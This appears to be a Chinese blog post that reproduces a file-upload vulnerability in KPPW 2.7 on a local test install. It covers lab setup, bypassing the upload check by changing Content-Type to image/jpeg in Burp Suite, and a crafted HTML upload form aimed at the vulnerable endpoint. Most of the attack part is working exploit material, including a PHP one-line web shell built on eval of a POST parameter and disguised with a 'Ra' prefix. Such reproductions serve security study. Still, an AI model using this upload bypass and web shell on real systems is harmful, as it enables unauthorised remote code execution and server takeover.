KPPW2.7 漏洞利用----文件上传
文件上传导致任意代码执行
搭建环境
1,集成环境简单方便,如wamp,phpstudy....
2,KPPW v2.7源码一份(文末有分享)放到WWW目录下面
3,安装,访问(http://127.0.0.1/test/KPPW2.7UTF8/KPPW2.7UTF8/install/index.php),选择下一步,下一步,填写数据库信息,后台管理员账号密码等等。
上述,漏洞复现平台搭建成功。
首页(http://127.0.0.1/test/KPPW2.7UTF8/KPPW2.7UTF8/index.php)。
漏洞利用
文件上传----任意代码执行漏洞
利用Burpsuite抓包,修改Content-Type 为 jpg ,从而进行文件上传。
Content-Type,内容类型,一般是指网页中存在的Content-Type,用于定义网络文件的类型和网页的编码,决定文件接收方将以什么形式、什么编码读取这个文件,这就是经常看到一些Asp网页点击的结果却是下载到的一个文件或一张图片的原因。
详细的content-type的各种类型,同样用burpsuite抓包,找到content-type字段,修改上传文件类型为image/jpeg,则可以绕过检测,上传脚本文件。
1、构造上传客户端html文件(orange.html):
<form method="POST" enctype="multipart/form-data" action="http://127.0.0.1/test/KPPW2.7UTF8/KPPW2.7UTF8/index.php?do=ajax&view=upload&file_type=big&filename=filename">
请选择文件: <br>
<input name="filename" type="file"><br>
<input type="submit" value="上传文件">
</form>
2、shell前面加上Ra(orange.php)
Ra<?php phpinfo(); ?>
Ra<?php @eval($_POST["orange"]); ?>
3、上传shell
一句话
漏洞复现至此结束!
源码链接(链接: https://pan.baidu.com/s/1qZRMYXu 密码: 3j7v)
本文链接(http://www.cnblogs.com/Oran9e/p/8259206.html),转载请注明。
任重而道远!